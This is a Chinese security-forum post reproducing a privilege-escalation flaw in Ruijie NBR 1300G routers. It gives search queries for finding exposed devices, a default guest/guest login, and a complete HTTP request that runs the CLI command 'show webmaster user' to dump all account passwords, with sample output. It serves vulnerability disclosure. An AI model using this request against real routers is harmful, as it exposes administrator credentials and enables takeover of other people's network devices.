问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Ruijie NBR 1300G路由器 越权CLI命令执行漏洞
# Ruijie NBR 1300G路由器 越权CLI命令执行漏洞 ## 漏洞描述 RuijieNBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码 ## 漏洞影响 RuijieNBR路由器 #...
Ruijie NBR 1300G路由器 越权CLI命令执行漏洞 =============================== 漏洞描述 ---- RuijieNBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码 漏洞影响 ---- RuijieNBR路由器 网络测绘 ---- title="Ruijie网络 --NBR路由器--登录界面" app="Ruijie-NBR路由器" 漏洞复现 ---- 登录页面如下 ![img](https://shs3.b.qianxin.com/butian_public/f454563417395bb322738bf73c4f45b5e529f98e0b76f.jpg) 查看流量发现 CLI命令流量 ![img](https://shs3.b.qianxin.com/butian_public/f163786410d376f2a82db337cd7bdf875cce7598cfb89.jpg) 请求包为 ```plain POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: Connection: keep-alive Content-Length: 73 Authorization: Basic User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: auth=; user= x-forwarded-for: 127.0.0.1 x-originating-ip: 127.0.0.1 x-remote-ip: 127.0.0.1 x-remote-addr: 127.0.0.1 command=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. ``` 测试发现执行其他命令需要权限,查看手册发现存在低权限 guest账户(guest/guest) 登录后发送请求包,执行CLI命令 `(show webmaster user)` 查看用户配置账号密码 ![img](https://shs3.b.qianxin.com/butian_public/f545456bb69965bab70fe7f6a5057741631914a89df91.jpg) 成功获取所有用户的账号密码 ```plain webmaster level 0 username admin password guest webmaster level 0 username guest password guest ```
发表于 2024-07-12 18:50:01
阅读 ( 1160 )
分类:
网络设备
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!